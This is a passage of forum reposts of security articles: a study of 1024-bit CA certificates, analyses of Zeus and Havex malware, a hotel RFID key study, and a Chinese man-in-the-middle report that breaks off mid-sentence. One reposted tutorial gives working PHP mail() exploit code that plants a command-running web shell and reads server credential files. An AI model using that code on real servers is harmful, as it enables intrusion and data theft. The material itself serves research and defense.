-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
Firma este foarte mare si serioasa, nu e firma de bloc. Recomand celor cu experienta.
-
[h=1]107,000 web sites no longer trusted by Mozilla[/h]Posted by jnickel in Project Sonar on Sep 4, 2014 3:48:43 PM Mozilla's Firefox and Thunderbird recently removed 1024-bit certificate authority (CA) certificates from their trusted store. This change was announced to the various certificate authorities in May of this year and shipped with Firefox 32 on September 2nd. This change was a long time coming, as the National Institute of Standards and Technology (NIST) recommended that 1024-bit RSA keys be deprecated in 2010 and disallowed after 2013. A blog post at http://kuix.de/blog provided a list of specific certificates that would no longer be trusted starting with Firefox 32. There is a little disagreement that 1024-bit RSA keys may be cracked today by adversaries with the resources of nation states. As technology marches on, the security of 1024-bit keys will continue to deteriorate and become accessible by operators of relatively small clusters of commodity hardware. In the case of a CA key, the successful factoring of the RSA primes would allow an adversary to sign any certificate just as the CA in question would. This would allow impersonation of any "secure" web site, so long as the software you use still trusts these keys. This is certainly a welcome change, but how many sites are going to be affected by the removal of these CA certificates, and, how many of these sites have certificates that aren't due to expire anytime soon? Fortunately there is a means to answer these questions. In June of 2012, the University of Michigan began scanning the Internet and collecting SSL certificates from all sites that responded on port 443. At Rapid7, we started our own collection of certificates starting in September of 2013 as part of Project Sonar, and have been conducting weekly scans since. Both sets of scans record the entire certificate chain, including the intermediate CA keys that Mozilla recently removed from the trusted store. We loaded approximately 150 scans into a Postgres database, resulting in over 65 million unique certificates, and started crunching the data. The first question we wanted to answer, which is how many sites are affected, was relatively easy to determine. We searched the certificate chain for each of the roughly 20 million web sites we index to check if the SHA1 hashes listed in the blog post are present in the signing chain. After several minutes Postgres listed 107,535 sites that are using a certificate signed by the soon-to-be untrusted CA certificates. That is a relatively large number of sites and represents roughly half a percent of all of the web sites in our database. The next question we wanted to explore was how long the 1024-bit CA key signed certificates would continue to be used. This proved to be informative and presents a clearer picture of the impact. We modified the first query and grouped the sites by the certificate expiration date, rounded to the start of the month. The monthly counts of affected sites, grouped by expiration date, demonstrated the full extent of the problem. The resultant data, shown in part in the graph below, makes it clear that the problem isn't nearly as bad as the initial numbers indicated, since a great many of the certificates have already expired and the rest will do so over the next year. Surprisingly, over 13,000 web sites presented a certificate that expired in July of this year. Digging into these, we found that almost all of these had been issued to Vodafone and expired on July 1st. These expired certificates still appear to be in use today. The graph below demonstrates that the majority of affected certificates have already expired and those that haven't expired are due to expire in the next year. We have excluded certificates from the graph that expired prior to 2013 for legibility. While Mozilla's decision will affect a few sites, most of those that are active and affected have already expired, and shouldn't be trusted on that basis alone. In summary, the repeal of trust for these certificates is a sound decision based upon NIST recommendations, and while it initially appeared that a great many sites would be affected, the majority of these sites either have expired certificates or a certificate that expires within the next year. We hope that Chrome and other browsers will also remove these certificates to remove the potential risk involved with these 1024-bit CA keys. Going forward, we are now tracking the certificates presented by SMTP, IMAP, and POP services, and will keep an eye on those as the data rolls in. If you still use a 1024-bit RSA key for any other purpose, such as a Secure Shell (SSH) or PGP, it is past time to consider those obsolete and start rolling out stronger keys, of at least 2048 bits, and using ECC-based keys where available. - Labs Sursa: https://community.rapid7.com/community/infosec/sonar/blog/2014/09/04/107000-web-sites-no-longer-trusted-by-mozilla
-
Exploit PHP’s mail() to get remote code execution September 3, 2014 While searching around the web for new nifty tricks I stumbled across this post about how to get remote code exeution exploiting PHP’s mail() function. Update: After some further thinking and looking into this even more, I’ve found that my statement about this only being possible in really rare cases was wrong. Since this can also be exploited in other scenarios which is much more common than I first thought. So, instead of removing content, I added a strike through on the statements that’s no longer valid, and updated with a 2nd scenario explanation. First, I must say that this is only going to happen under some really rare circustances. Never the less, it’s really something to think about and keep an eye out for. I will explain an example scenario which I think could be a real life scenario later in this article. So, when that’s said, let’s have a look at what this is all about. When using PHP to send emails we can use PHP’s built in function mail(). This function takes a total of five parameters. To Subject Message Headers (Optional) Parameters (Optional) This looks pretty innocent at first glance, but if this is used wrong it can be really bad. The parameter of interest is the 5th and last one, so let’s have a look at what the PHP manual has to say about it. The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option. This is really interesting. In short, this say that we can alter the behavior of the sendmail application. Update: I should have added this from the beginning, but just to make this clear: The fifth argument is disabled when PHP is running in safe mode mail() In safe mode, the fifth parameter is disabled. (note: only affected since PHP 4.2.3) Source: PHP: Functions restricted/disabled by safe mode - Manual Now, let’s have a look at the sendmail manual. I’m not going to post the entire manual here, but I will highlight some of the interesting parts. Some interesting parameters -O option=value Set option option to the specified value. This form uses long names. -Cfile Use alternate configuration file. Sendmail gives up any enhanced (set-user-ID or set-group-ID) privileges if an alternate configuration file is specified. -X logfile Log all traffic in and out of mailers in the indicated log file. This should only be used as a last resort for debugging mailer bugs. It will log a lot of data very quickly. Some interesting options QueueDirectory=queuedir Select the directory in which to queue messages. So how can this be exploited? Remote Code Execution As stated above, this only occurs under very specific circumstances. For this to be exploitable, the user has to be able to control what goes into the 5th parameter, which does not make sense at all that anyone would do it. But it’s still something that really should be kept in mind by developers. With that said, let’s just dive into it! This is the code for exploiting the mail() function $to = 'a@b.c'; $subject = '<?php system($_GET["cmd"]); ?>'; $message = ''; $headers = ''; $options = '-OQueueDirectory=/tmp -X/var/www/html/rce.php'; mail($to, $subject, $message, $headers, $options); Let’s inspect the logs from this. First let’s have a look at what we can see in the browser by only going to the rce.php file 11226 <<< To: a@b.c 11226 <<< Subject: 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< Nothing really scary to see in this log. Now, let’s use the cat command in the terminal on the same file > cat rce.php 11226 <<< To: a@b.c 11226 <<< Subject: <?php system($_GET["cmd"]); ?> 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< See anything a bit more interesting? Let’s try to execute some commands. I visit http://localhost/rce.php?cmd=ls%20-la and get the following output 11226 <<< To: a@b.c 11226 <<< Subject: total 20 drwxrwxrwx 2 *** *** 4096 Sep 3 01:25 . drwxr-xr-x 4 *** www-data 4096 Sep 2 23:53 .. -rw-r--r-- 1 *** *** 92 Sep 3 01:12 config.php -rwxrwxrwx 1 *** *** 206 Sep 3 01:25 mailexploit.php -rw-r--r-- 1 www-data www-data 176 Sep 3 01:27 rce.php 11226 <<< X-PHP-Originating-Script: 1000:mailexploit.php 11226 <<< 11226 <<< 11226 <<< 11226 <<< [EOF] Now, let me break it down in case you don’t fully understand the code The first four variables is pretty straight forward. We set the recipient email address to some bogus address, then in the subject we inject the PHP code that will be executing our commands on the system, followed by empty message and headers. Then on the fith variable is where the magic happens. The $options variable holds a string that will let us write our malicious code get remote code execution to the server. First we change the mail queue directory to /tmp using the -O argument with the QueueDirectory option. The reason why we want it there is because this is globally writable. Second the path and filename for the log is changed to /var/www/html/rce.php using the -X argument. Keep in mind that this path will not always be the same. You will have to craft this to fit the targets file system. If we now point our browser at http://example.com/rce.php it will display the log for the attempted delivery. But since we added the PHP code to the $subject variable, we can now add the following query ?cmd=[some command here]. For example http://example.com/rce.php?cmd=cat%20/etc/passwd. If you want you could also create a Local/Remote File Inclusion vulnerability as well. To do this, just change system() to include(). This can be handy if wget is not available, or you’re not able to include a remote web shell. It’s also important to know, that it’s not only the subject field that can be used to inject arbitrary code. The content of all the fields, except the fifth, is written to the log. Read files on the server Another way to exploit this is to directly read files on the server. This can be done by using the -C argument as shown above. I have made a dummy configuration file just to show how it works $to = ‘a@b.c'; $subject = ''; $message = ''; $headers = ''; $options = '-C/var/www/html/config.php -OQueueDirectory=/tmp -X/var/www/html/evil.php'; mail($to, $subject, $message, $headers, $options); This creates a file named evil.php with the following content 11124 >>> /var/www/html/config.php: line 1: unknown configuration line "<?php" 11124 >>> /var/www/html/config.php: line 3: unknown configuration line "dbuser = 'someuser';" 11124 >>> /var/www/html/config.php: line 4: unknown configuration line "dbpass = 'somepass';" 11124 >>> /var/www/html/config.php: line 5: unknown configuration line "dbhost = 'localhost';" 11124 >>> /var/www/html/config.php: line 6: unknown configuration line "dbname = 'mydb';" 11124 >>> No local mailer defined Now we have managed to extract very sensitive data, and there’s a lot of other things we can extract from the server. A real-life scenario where this can become a reality Scenario #1: Admin panel To be honest I actually had to think for this for a file. I mean, who would be so stupid that they let their users control the sendmail parameters. Well, it really doesn’t have to be that stupid. So consider this following scenario. You have an admin panel for your website. Just like every other admin panel with respect for itself it let’s your set different settings for sending emails. Stuff like port, smtp, etc. But not only that, this administration panel actually let’s you monitor your mail logs, and you can decide where to store the logs. Suddenly the idea of the values of the 5th parameter being controlled by an end user doesn’t sound that stupid anymore. You would of course not let this be modified from the contact form But admins wouldn’t hack their own site would they.. So in combination with other attacks that results in unauthorized access, this can become a real threat since you can actually create vulnerabilities that was not originally in the application. Scenario #2: Email service The idea around this scenario spawned from the original post linked to in the beginning of the article. So, let’s consider we are running a website where a person can send an email to a recipient. In this case, the user must manually set the from address. Now, in the code we use the -f argument along with the user inputted from address. Now if this from field is poorly validated and sanitized the user can continue writing the required arguments and values directly. How to detect a possible vulnerability The fastes way to detect any possibility for this in code is to use Linux’s grep command, and recursively look for any use of mail() with all 5 parameters in use. Position yourself in the root of whatever project you want to check and execute the following command. This will return all code lines that uses mail() with five parameters. grep -r -n --include "*.php" "mail(.*,.*,.*,.*,.*)" * There will probably be some false positives, so if you have any suggestions to improve this to make it even more accurate, please let me know! Summary This is not something that you will stumble across often. To be honest I don’t expect to ever see this in the wild at all, though it would be really cool to do so, but you never know as explained in the “real-life scenario” section. Still, I do find this to be really interesting, and it makes you think “what other PHP functions can do this?” I hope you enjoyed the article and if you have any comments you know what to do Sursa: Exploit PHP’s mail() to get remote code execution | Security Sucks
-
Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption
Nytro replied to Nytro's topic in Tutoriale video
Da. Bine, cam rare cazurile in care ai acces la un dump de memorie al cuiva. Daca ai avea acces la acel calculator ai avea deja acces la toate fisierele montate cu TrueCrypt. -
Thursday, September 4, 2014 Malware Using the Registry to Store a Zeus Configuration File This blog was co-authored by Andrea Allievi. A few weeks ago I came across a sample that was reading from and writing a significant amount of data to the registry. Initially, it was thought that the file may be a binary, but after some analysis it was determined that the file is a configuration file for Zeus. Within this blog post we take a look at our analysis of the data I/O in the registry. Initial Stages of Infection The scope of this paper is the analysis of the registry write. This section is a brief overview of what happens when the malware is executed. Unpacks Creates a copy of itself in the tmp directory Injects itself into explorer.exe Starts a thread that executes the injected code The code injected into Explorer.exe becomes the focus of our analysis. To get started, an infinite loop was added to the entry point of the injected code and Ollydebug was used to attached to Explorer.exe. Debugging injected code in this manner was previously covered here. Analysis After attaching the debugger and prior to continuing execution, a breakpoint is set on Advapi32.RegSetValueExW() before the large data write is made. This breakpoint is tripped multiple times by multiple threads within Explorer.exe. Most of the time the threads are related to the injected ZBot code. It turns out that the same thread is used consistently for writing to this registry key. Several sub-keys are created to store data that the application uses at a later time.The names of the sub-keys are created using an index value that is combined with other data to appear random. For instance, the key “2f0e9h99” was created by combining a hash of the User SID with the index value 0x9A. Throughout this paper, the registry key will be referenced by either name or index. A Series of Registry Writes This section establishes a pattern to the registry activity that can be used to help figure out what the malware is accomplishing with the registry I/O. The registry activity centers around writing to the following key: HKUSERS\<sid>\Software\Microsoft\Ujquuvs. The “ujquuvs” is dynamically generated by the application and will change between executions. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Ujquuvs Registry Key Prior to[/TD] [/TR] [/TABLE] Prior to the first registry write of interest the Ujquuvs sub-key contains the values shown in the above graphic. Throughout this section we’ll see that new value names are generated and data is cycled between the keys. One of the first chunks written to the registry value 2f0e9h99 is a binary string that is 475 bytes in length. The following graphic shows the call to the Windows Advapi32.RegSetValueExW() procedure made by the malware. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]RegSetValueExW() Stack[/TD] [/TR] [/TABLE] [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]First Registry Write to 2f0e9h99[/TD] [/TR] [/TABLE] The above graphic displays the binary string data that was written to the registry. Although 475 bytes is a significant chunk of data written to the registry it is not what caused an alarm. The registry write I am looking for is greater than 3000 bytes. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Second Registry Write to 2f0e9h99[/TD] [/TR] [/TABLE] Another 475 byte write occurs, but the data is different than the first write. It is worth noting that although the data is different the first four bytes appear to be the same “5D BB 95 50” pattern. This may be a header used to distinguish the data. The next call to RegSetDataExW will write 3800 bytes to the registry. The binary data was replaced with alphanumeric data (possibly base64). Another assumption can be made. The original binary data is encoded and then stored back to the registry. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Alphanumeric Data Written to 2f0e9h99[/TD] [/TR] [/TABLE] This is one of the large data writes that was flagged by the sandbox. Continuing on we see several more data writes all of which are variations of the above. The data cycles between binary strings and alphanumeric strings, and the string lengths vary. One of the largest data writes was an 7200 byte alphanumeric string. Registry Reads Along with the registry writes there are usually corresponding registry reads. The data located in 2f0e9h99 is pulled into a buffer and manipulated by the application. Once the data is read, decoded from alphanumeric encoding to a long list of 475 byte chunks of binary data. These chunks of data contain a hash to identify specific chunks within the list. Whenever a new chunk of data is received the data contained in 2f0e9h99 is decoded and the hash value of the received chunk of data is compared against each chunk that exists already within the registry. If these hash values match, then the that registry data chunk is replaced with the incoming data. Otherwise the data is appended to the bottom of the list. Once the input queue is empty the calls to read or write to the registry stop. The thread has not been killed, but it is (most likely) suspended until some event occurs. The next section combines these findings with further analysis to track down the source of the registry writes. ZBotThread_1 Procedure Walking through the executable with a debugger led us to the source of the registry writes. A thread is created and starts executing the code at address 0x41F579. From here on out this code is going to be referred to as ZBotThread_1(). This procedure is the backbone for all activity related to this registry key. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Network Socket Loop[/TD] [/TR] [/TABLE] After several instructions for initializing various data structures, ZBotThread_1() initializes a network socket to communicate with a remote server. Once traffic is received the IP address is verified against an IP blacklist of network address ranges that exists within a data structure used throughout the application. These IP Address ranges appear to be owned by various AV vendors (indicated here). Here is the list of blacklisted address ranges with the corresponding netmasks: 64.88.164.160 255.255.255.224 64.233.160.0255.255.224.0 65.52.0.0255.252.0.0 66.148.64.0 255.255.192.0 84.74.14.0 255.255.255.0 91.103.64.0255.255.252.0 91.200.104.0 255.255.255.0 91.212.143.0 255.255.255.0 91.212.136.0 255.255.255.0 116.222.85.0255.255.252.0 128.130.0.0 255.254.0.0 131.107.0.0 255.255.0.0 150.26.0.0 255.255.255.0 193.71.68.0255.255.255.0 193.175.86.0 255.255.255.0 194.94.127.0 255.255.255.0 195.74.76.0 255.255.255.0 195.164.0.0 255.255.0.0 195.168.53.48 255.255.0.0 195.169.125.0 255.255.255.0 204.8.152.0255.255.248.0 207.46.130.0 255.255.0.0 208.118.60.0255.255.240.0 212.5.80.0 255.255.255.192 212.67.88.64 255.255.224.0 Once the IP address is verified the payload is decrypted and the data is initialized into the following data structure (sub_41F9C6): [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]ZBOT_SOCKET_DATA structure[/TD] [/TR] [/TABLE] Throughout this post we will refer to this as ZBOT_SOCKET_DATA. Each datagram payload contains this data structure. The lpDataBuff points to a buffer that contains the data that will eventually be written to the registry. In addition, the dataBuffHeader[0x2C] contains the first 44 bytes of the decrypted received data. These bytes contain critical information about the entire data chunk. After a few checks to verify the integrity of the data, ZBotThread_1 calls AnalyseSockDataAndUpdateZBot (sub_43D305). This function will take the 20 byte hash of the data contained within the data chunk header (first 44 bytes) and compares it against a list of other hashes. This list of hashes is built out of previously received datagrams. If the hash is part of the list then the data is dropped. Otherwise, the hash is appended to the end of the list. Next, AnalyseAndFinalizeSockData (sub_41D006) is called to begin the process of adding the data to the registry. Once inside the function, the data type (dataBuffHeader+0x3) is checked. There are several different data types, but the one that is relevant for the purposes of this blog post is type 0x6. This signifies the end of the data stream and the malware can proceed to save the data to registry key 2f0e9h99 The type 0x6 code branch calls VerifyFinalSckDataAndWriteToReg (sub_436889). This function strips the 0x2C length header from the socket data before verifying the integrity using RSA1. Finally, if the data integrity is good, the WriteSckDataToReg function is called. Writing Socket Data to the Registry The previously received socket data has already been written to registry key 2f0e9h99. At this point, the socket data needs to be merged with the data contained within the registry key. Before this can occur, the data is currently alphanumerically encoded (see the registry write section above). The decoded data is a series of 0x1D0 hex byte chunks. Each chunk is a ZBOT_SOCKET_DATA structure. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Alphanumeric Encoded Data in Memory[/TD] [/TR] [/TABLE] The hash of the socket data is compared against the hash of each chunk contained within the list of chunks. If the hashes match, then that registry data chunk is replaced with the network socket data. Otherwise the network socket data is appended to the end of the list. Once the update is completed the registry data is (once again) alphanumerically encoded and written back to the 2f0e9h99 registry key. It’s worth noting that our sample dropper can encode the original data in several different ways: Base64, and 3 customized XOR algorithms (see function at VA 0x4339DE for all the details). Summary Using the registry as a way to store and update a configuration is a clever idea. The multiple writes and reads that come with constructing the file with a registry key will raise alarms. It’s what originally grabbed our interest. This blog post covers a small percentage of the functionality of this malware sample. Some of the functionality that we uncovered denote a high level of sophistication by the author. We strongly encourage others to download a copy and crack open their debuggers. Sample MD5 Hashes: Dropper: DA91B56D5A85CAADDB00908220D62B92 Injected Code: B4A00F4C6F025C0BC12DE890A2C1742E Written by Shaun Hurley at 1:00 PM Sursa: VRT: Malware Using the Registry to Store a Zeus Configuration File
-
RFID, when the manufacturer matters Nowadays we can find RFID technology almost everywhere: in supermarkets (anti-theft), in assembly lines (identify & track items), in highways (tolls), in public transportation, in your passport and your credit card and it is also used by many companies and by hotels for access management. This post is about the latter. Indeed, during my trips, should it be for business or for holidays, I have stayed in many hotels. Some of them were still using good old keys like you do at home, most of them still use magnetic cards and some were relying on RFID cards to give you access to your room. Unfortunately, the security level of such RFID access management highly depends on the manufacturer as we will see. First, let’s begin with the tools I use. I started messing with RFID more than a year ago and today, I mostly rely on two tools: A proxmark3 which is a really awesome tool, able to deal with low frequency tags (120-135 kHz) and high frequency tags (13.56 MHz) but it’s pretty expensive, you have to handle external antennas and it relies on a dedicated client An OpenPCD 2 which only deals with a limited amount of high frequency tags but it’s opensource, credit card sized, and natively supported with libnfc and related tools. So, basically, proxmark3 is useful when you are at home or at the office and it is mandatory for specific RFID technologies but usually, when I travel, I try to keep my hand-luggage as light as possible. That’s why I mostly rely on my Android tablet and why I avoid carrying specific cables (proxmark uses one of those between the main PCB and the antenna). To still be able to mess with RFID/NFC technologies I might encounter while travelling, I cross-compiled a recent version of libnfc and mfoc to reasily crack Mifare Classic keys. There is also a tool called mfcuk but unfortunately this one had never worked so far… It only displays timing errors and never finishes. By googling, I don’t seem to be the only one encountering issues with it… I won’t go into details about all kind of RFID tags that you might encounter but I am going to detail some of the NXP tags inside their Mifare family, which still seems the most popular ones for 13.56 MHz tags: Mifare Ultralight (64 bytes memory divided into 16 pages of 4 bytes, almost no protection) Mifare Classic (1KB or 4KB memory, divided into blocks, with r/w protection relying on two 6 bytes keys and custom cryptography algorithm called Crypto1 which is broken) Mifare Plus (2KB or 4KB memory, adds AES-128 cipher to the Mifare Classic tag) Mifare DESfire (2KB, 4KB or 8KB and uses DES cipher) All those cards have a read-only area at the beginning of the memory that has been set by the manufacturer. More details about NXP Mifare family here. OK, enough “theory” for now So far, I encountered two manufacturers of RFID key systems dedicated to hotels: VingCard Elsafe, a Norwegian company Kaba Ilco, a Swiss or German company VingCard seems to be quite an old player in hotel locks as I have already seen cards like those: They might ring a bell for those of my readers who began working with computers when punch cards were the only way to interface with a computer ;-) But let’s go back to recent wireless technologies. As far as I can tell, VingCard uses Mifare Ultralight tags for their locks. If you have read carefully the last paragraphs, you may rememer that this particular kind of token lacks security measures: anybody can freely read the content (64 bytes of data). On the other side, Kaba is using Mifare Classic 1K cards for the customer’s keys and Mifare Classic 4K for manager’s keys (sort of master key + required to program customer’s keys). At least, on those, we found a bit of security. Unfortunately, crypto1, NXP’s cipher algorithm, is broken and you can recover all the keys in a matter of minutes (or something only a few seconds) with the tools I mentionned (mfoc / mfcuk or proxmark3). My first goal to understand how those keys work was to dump them, several times, entering the room between dumping attempts just to check if it has a counter stored in it. At least, I expect to find, maybe encoded in a weird way: the room number start date of my stay duration of the stay Also, to get extra dumps, I went back at the reception desk, asking them to program again my key because it was not working anymore or even asking them a new key because I seemed to have lost the first one (of course, I have given back both keys at checkout to avoid extra charges). Another thing to try when you have friends or family in the same hotel is to dump their keys too, specially if they are on the rooms next to yours (or at least on the same floor in case the floor is also encoded in the card). This way I was able bindiff the dumps and try to find useful stuff. Let’s begin with VingCard. Here is the result while running vbindiff agains two different keys encoded for the same room: That’s a lot of red! The first few bytes have to be different because it is the “unique ID” of the tag. But if we take a closer look at those dumps, we can see a pattern: one byte is repeated a lot on each dump in the red part. This value might be used to XOR the useful content. And the 4 final bytes might be a checksum value. Note also the constant 0x21 value across those dump at offset 0x13. Surprisingly, it matches the length of the big red block… Let’s try again vbindiff after XORing the 33-bytes red memory block… That’s definitely better! But we will have to found out later how this byte is computed… The next assumption we can take is for the three bytes located at 0x1F-0x21: on this particular hotel, I was given two room keys at once. So it might be the “key number” or something related. Next step is to compare keys encoded for two different rooms within the same hotel (after XORing their respective blocks of course): Bingo! We still have the same differences we have seen. Appart from that, only two bytes have changed between those cards. Those have to be the room number (or at least some sort of lock ID number). Also, if you look carefully at the last two screenshots, you may notify that the byte at offset 0x1F only has 2 possible values so far: 0x42 or 0x82. As it was a short stay (1 night), I wasn’t able to go deeper on those (trying to figure out the duration encoding and things like that). But remember, we still have to find how the XOR key is computed and what kind of checksum is used. Well, for that part, I may disappoint you but no luck so far If any of my readers have a clue, please leave it in the comments and I will test it against all the dumps I have. At the beginning I was talking about comparing the badly designed VingCard RFID system against Kaba Ilco’s one. Long story short, by applying the exact same method, I can tell you that this one seems pretty good in several points: Mifare Classic keys (A and seem to be derived from the UID of the tag but despite a whole bunch of dumps, I wasn’t able to find an obvious algorithm While bindiff-ing two dumps, I always ended up with two completely different 16-bytes blocks even after having my key reprogrammed. Marketing brochures states that they use cryptography so my guess would be that this is an encrypted block, depending on the Mifare Classic 4K tag (the Manager key) that has been used to program it. Moreover, the brochure also states that the cipher key is renew every 30 days. Going further on Kaba Ilco’s system would require to use the proxmark3 for passively sniffing RFID exchanges between the tag and the lock. As a conclusion, we can say that every manufacturer states that his system is secure but one should really ensure that it actually is, either by auditing the system himself or by relying on a third-party actor that can do that. by Jean-Michel Picod Sursa: A little bit of everything • RFID, when the manufacturer matters...
-
[h=3]Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption[/h]This video shows how to use Volatility’s new Truecrypt plugins to defeat disk encryption on suspect computers running 64-bit Windows 8 and server 2012. The video is narrated by Apple's text to speech and you can find the actual text on the Youtube page. The live/in-person demo was given at the @Toolswatch Blackhat Arsenal. Posted by Michael Hale Ligh at 10:08 AM Sursa: Volatility Labs: Volatility 2.4 at Blackhat Arsenal - Defeating Truecrypt Disk Encryption
-
Analysis of Havex Published on 2014-09-03 13:00:00. Tools IDA 6.6 demo PE.explorer Static analysis Havex is a well-known RAT. Recently a new plugin appeared and it targets ICS/SCADA systems. We found many different samples. Let’s start by looking at one. MD5sum: 6bfc42f7cb1364ef0bfd749776ac6d38 6bfc42f7cb1364ef0bfd749776ac6d38 SHA1sum: db8ed2922ba5f81a4d25edb7331ea8c0f0f349ae 6bfc42f7cb1364ef0bfd749776ac6d38 All files are just simple Windows 32-bit DLLs, with no obfuscation, not packed. Nothing creepy! Take a look at the import table. It uses basic anti-debugging tricks (IsDebuggerPresent, GetTickCount…), no winsocket API are call. The most interesting is the import table from MPR.dll. According to the MSDN, WNet* functions are used to enumerate networks resources and connections. If we look at the Unicode strings, we see clearly something interesting. Looking at string’s reference, we find a function that scans the LAN network. Just after scanning the network, another function that calls WNetEnum* API functions we have seen previously in the import table. And it calls WriteLogs, as I named it. It writes what it finds into a log file in %TEMP% directory. After scanning the LAN, more interesting things happen. It is going to scan for OPC servers. But how can this be done? Look at the sub_100019E7 function: it starts by creating a thread. It launches COM API functions. Parameter Unk_10030C70 has the value 9DD0B56C-AD9E-43EE-8305-487F3188BF7A. It is uses to get a list of servers (IID_IOPCServerList2). Clsid 6C0B50D-09D9-E0AD-0EE4-3835487F31880BF7A is used to retrieve the COM class factory for component (CLSID_OPCServerList). It searches OPC Tags: All it finds is written to a file, and sent to the C&C by the RAT. Conclusion: This Havex plugin is not difficult to analyse and understand, it does not attack, but is clearly designed to spy industrial networks. References: MSDN: WNetOpenEnum WNetEnumRessource CoInitializeEx CoCreateInstanceEx Article: F-secure Sursa: https://www.malware.lu/articles/2014/09/03/analysis-of-havex.html
-
Analysis of Chinese MITM on Google The Chinese are running a MITM attack on SSL encrypted traffic between Chinese universities and Google. We've performed technical analysis of the attack, on request from GreatFire.org, and can confirm that it is a real SSL MITM against Google and that it is being performed from within China. We were contacted by GreatFire.org two days ago (September 3) with a request to analyze two packet captures from suspected MITM-attacks before they finalized their blog post. The conclusions from our analysis is now published as part of GreatFire.org's great blog post titled “Authorities launch man-in-the-middle attack on Google”. In their blog post GreatFire.org write: From August 28, 2014 reports appeared on Weibo and Google Plus that users in China trying to access google.com and google.com.hk via CERNET, the country’s education network, were receiving warning messages about invalid SSL certificates. The evidence, which we include later in this post, indicates that this was caused by a man-in-the-middle attack. While the authorities have been blocking access to most things Google since June 4th, they have kept their hands off of CERNET, China’s nationwide education and research network. However, in the lead up to the new school year, the Chinese authorities launched a man-in-the-middle (MITM) attack against Google. Our network forensic analysis was performed by investigating the following to packet capture files: [TABLE] [TR] [TH]Capture Location[/TH] [TH]Client Netname[/TH] [TH]Capture Date[/TH] [TH]Filename[/TH] [TH]MD5[/TH] [/TR] [TR] [TD]Peking University[/TD] [TD]PKU6-CERNET2[/TD] [TD]Aug 30, 2014[/TD] [TD]google.com.pcap[/TD] [TD]aba4b35cb85ed218 7a8a7656cd670a93[/TD] [/TR] [TR] [TD]Chongqing University[/TD] [TD]CQU6-CERNET2[/TD] [TD]Sep 1, 2014[/TD] [TD]google_fake.pcapng[/TD] [TD]3bf943ea453f9afa 5c06b9c126d79557[/TD] [/TR] [/TABLE] Client and Server IP adresses The analyzed capture files contain pure IPv6 traffic (CERNET is a IPv6 network) which made the analysis a bit different then usual. We do not disclose the client IP addresses for privacy reasons, but they both seem legit; one from Peking University (netname PKU6-CERNET2) and the other from Chongqing University (CQU6-CERNET2). Both IP addresses belong to AS23910, named "China Next Generation Internet CERNET2". Peking University entrance by galaygobi. Licensed under Creative Commons Attribution 2.0 Chongqing University gate by Brooktse. Licensed under Creative Commons Attribution-Share Alike 3.0 The IP addresses received for Google were in both cases also legit, so the MITM wasn't carried out through DNS spoofing. The Peking University client connected to 2607:f8b0:4007:804::1013 (GOOGLE-IPV6 in United States) and the connection from Chongqing University went to 2404:6800:4005:805::1010 (GOOGLE_IPV6_AP-20080930 in Australia). Time-To-Live (TTL) Analysis The Time-To-Live (TTL) values received in the IP packets from Google were in both cases 248 or 249 (note: TTL is actually called ”Hop Limit” in IPv6 nomenclature, but we prefer to use the well established term ”TTL” anyway). The highest possible TTL value is 255, this means that the received packets haven't made more than 6 or 7 router hops before ending up at the client. However, the expected number of router hops between a server on GOOGLE-IPV6 and the client at Peking University is around 14. The low number of router hops is is a clear indication of an IP MITM taking place. CapLoader with both capture files loaded, showing TTL values Here is an IPv6 traceroute from AS25795 in Los Angeles towards the IP address at Peking University (generated with ARP Networks' 4or6.com tool): #traceroute -6 2001:da8:201:1374:8ea9:82ff:fe3c:322 1 2607:f2f8:1600::1 (2607:f2f8:1600::1) 1.636 ms 1.573 ms 1.557 ms 2 2001:504:13::1a (2001:504:13::1a) 40.381 ms 40.481 ms 40.565 ms 3 * * * 4 2001:252:0:302::1 (2001:252:0:302::1) 148.409 ms 148.501 ms 148.595 ms 5 * * * 6 2001:252:0:1::1 (2001:252:0:1::1) 148.273 ms 147.620 ms 147.596 ms 7 pku-bj-v6.cernet2.net (2001:da8:1:1b::2) 147.574 ms 147.619 ms 147.420 ms 8 2001:da8:1:50d::2 (2001:da8:1:50d::2) 148.582 ms 148.670 ms 148.979 ms 9 cernet2.net (2001:da8:ac:ffff::2) 147.963 ms 147.956 ms 147.988 ms 10 2001:da8:[REDACTED] 147.964 ms 148.035 ms 147.895 ms 11 2001:da8:[REDACTED] 147.832 ms 147.881 ms 147.836 ms 12 2001:da8:[REDACTED] 147.809 ms 147.707 ms 147.899 ms As can be seen in the traceroute above, seven hops before the client we find the 2001:252::/32 network, which is called “CNGI International Gateway Network (CNGIIGN)”. This network is actually part of CERNET, but on AS23911, which is the network that connects CERNET with its external peers. A reasonable assumption is therefore that the MITM is carried out on the 2001:252::/32 network, or where AS23910 (2001:da8:1::2) connects to AS23911 (2001:252:0:1::1). This means that the MITM attack is being conducted from within China. Response Time Analysis The round-trip time between the client and server can be estimated by measuring the time from when the client sends it initial TCP SYN packet to when it receives a TCP SYN+ACK from the server. The expected round-trip time for connecting from CERNET to a Google server overseas would be around 150ms or more. However, in the captures we've analyzed the TCP SYN+ACK package was received in just 8ms (Peking) and 52ms (Chongqing) respectively. Again, this is a clear indication of an IP MITM taking place, since Google cannot possibly send a response from the US to CERNET within 8ms regardless of how 